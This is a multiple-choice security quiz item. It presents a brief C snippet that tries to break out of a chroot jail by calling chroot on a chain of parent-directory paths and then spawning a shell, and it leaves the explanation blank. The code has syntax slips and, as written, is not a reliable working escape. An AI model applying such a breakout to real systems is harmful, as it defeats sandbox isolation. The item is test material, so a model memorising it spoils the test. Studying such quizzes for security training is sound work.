What is the following shellcode trying to accomplish?
int main(void) {
mkdir(“A”);
chdir(“A”);
chroot(“..//..//..//..//..//..//..//..//”);
system(“/bin/sh”)
A.
Corrupt the Linux kernel
B.
Break out of “chroot jail”
C.
Traverse to the /bin/sh directory
D.
Create a buffer overflow
Explanation: